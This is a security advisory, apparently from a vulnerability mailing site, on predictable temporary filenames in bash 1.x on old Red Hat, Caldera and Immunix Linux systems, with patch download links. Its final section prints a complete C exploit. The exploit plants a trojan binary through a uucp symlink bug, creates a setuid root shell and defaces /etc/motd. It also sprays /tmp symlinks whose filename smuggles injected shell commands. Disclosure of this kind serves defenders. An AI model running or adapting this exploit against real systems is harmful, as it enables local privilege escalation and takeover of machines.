|
|
|
|
| |
| Bash creates temporary files for its scripts in an insecure manner. This can be exploited via a symlink attack to create or write over arbitrary files on the system if the shell is run by root. |
| |
Credit:
The information has been provided by Caldera Support Info, RedHat Bugzilla, Greg KH and zenith parsec.
|
| |
Vulnerable systems:
Immunix OS 6.2
OpenLinux Desktop 2.3
OpenLinux eServer 2.3 and OpenLinux eBuilder for ECential 3.0
OpenLinux eDesktop 2.4
Red Hat Linux 5.0 - i386, Alpha, Sparc
Red Hat Linux 5.1 - i386, Alpha, Sparc
Red Hat Linux 5.2 - i386, Alpha, Sparc
Red Hat Linux 6.0 - i386, Alpha, Sparc
Red Hat Linux 6.1 - i386, Alpha, Sparc
Red Hat Linux 6.2 - i386, Alpha, Sparc
Red Hat Linux 6.2EE - i386, Alpha, Sparc
The << operator in bash 1.x used predictable filenames. This can lead to a potential denial of service attack - a local user account is required to exploit the security hole.
Patch availability and exploit code are listed below.
Patch:
Immunix 6.2:
Precompiled binary packages for Immunix 6.2 are available at:
http://www.immunix.org/ImmunixOS/6.2/updates/RPMS/bash-1.14.7-23.6x_StackGuard.i386.rpm
Source packages for Immunix 6.2 are available at:
http://www.immunix.org/ImmunixOS/6.2/updates/SRPMS/bash-1.14.7-23.6x_StackGuard.src.rpm
OpenLinux Desktop 2.3:
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/
The corresponding source code package can be found at:
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS
RPMS/bash-1.14.7-14.i386.rpm
SRPMS/bash-1.14.7-14.src.rpm
OpenLinux eServer 2.3 and OpenLinux eBuilder for ECential 3.0:
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
The corresponding source code package can be found at:ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
RPMS/bash-1.14.7-14.i386.rpm
SRPMS/bash-1.14.7-14.src.rpm
OpenLinux eDesktop 2.4:
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
The corresponding source code package can be found at:
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
RPMS/bash-1.14.7-14.i386.rpm
SRPMS/bash-1.14.7-14.src.rpm
Red Hat Linux 5.2:
Alpha:
ftp://updates.redhat.com/5.2/alpha/bash-1.14.7-23.5x.alpha.rpm
Sparc:
ftp://updates.redhat.com/5.2/sparc/bash-1.14.7-23.5x.sparc.rpm
i386:
ftp://updates.redhat.com/5.2/i386/bash-1.14.7-23.5x.i386.rpm
Sources:
ftp://updates.redhat.com/5.2/SRPMS/bash-1.14.7-23.5x.src.rpm
Red Hat Linux 6.2:
Alpha:
ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm
i386:
ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm
Sources:
ftp://updates.redhat.com/6.2/SRPMS/bash-1.14.7-23.6x.src.rpm
Exploit:
#include <stdlib.h>
#include <stdio.h>
#define FNAME "/usr/man/man1/last.1.gz;export PATH=.;cd ..;cd ..;cd ..;cd ..;cd usr;cd sbin;uuconv;.1.gz"
main()
{
int d;
char fn[2000];
char *homedir;
FILE *file;
printf("bashack - root using multiple config/input validation errors\n\n");
printf("creating trojan in /usr/sbin/uuconv\n");
printf(" - uucp bug -\n");
printf("uucp follows symlinks as euid=uucp, (uid,gid,egid=you)\n\n");
homedir=getenv("HOME");
sprintf(fn,"%s/bashacker/",homedir);
mkdir(fn);
chdir(fn);
sprintf(fn,"%s/bashacker/bashaker",homedir);
unlink(fn);
printf("== uuconv replacement\n");
printf("* making uuconv.c\n");
sprintf(fn,"%s/bashacker/uuconv.c",homedir);
file=fopen(fn,"w");
sprintf(fn,"%s/bashacker",homedir);
fprintf(file,"main()\n{\n");
fprintf(file,"printf(\"sendmail\n\");\n");
fprintf(file,"system(\"/bin/cp /bin/bash %s/bashacker;",fn);
fprintf(file,"/bin/chmod 6711 %s/bashacker;",fn);
fprintf(file,"echo hacked by %s>>/etc/motd;",getenv("LOGNAME"));
fprintf(file,"echo -n \\\"at about \\\" >>/etc/motd; /bin/date >>/etc/motd");
fprintf(file,"\");\n");
fprintf(file,"}\n");
fclose(file);
printf("* compiling ./uuconv.c ==> ./uuconv \n");
system("cc -o uuconv uuconv.c -O2;strip uuconv");
unlink("/var/spool/uucppublic/uuconv");
symlink("/usr/sbin/uuconv","/var/spool/uucppublic/uuconv");
printf("* copying to /usr/sbin via uucp bug\n");
sprintf(fn,
"/usr/bin/uucp %s/bashacker/uuconv /var/spool/uucppublic/uuconv",homedir);
system(fn);
printf("== cleaning up a little.\n");
unlink("/var/spool/uucppublic/uuconv");
unlink("uuconv");
unlink("uuconv.c");
printf("== set up /tmp for bash part of exploit.\n");
for(d=100;d<150;d++)
/*
on my machine its something like 118-120 or something, but it does
depend on what was running, or what files existed and stuff.
so please excuse the shotgun approach.
*/
{
sprintf(fn,"/tmp/t%d-sh",d);
unlink(fn);
symlink(FNAME,fn);
}
printf("* my work here is done.\n\n");
printf("now pray for some kinda of crash.\n\n\t--zen\n");
}
|
|
|
|
|
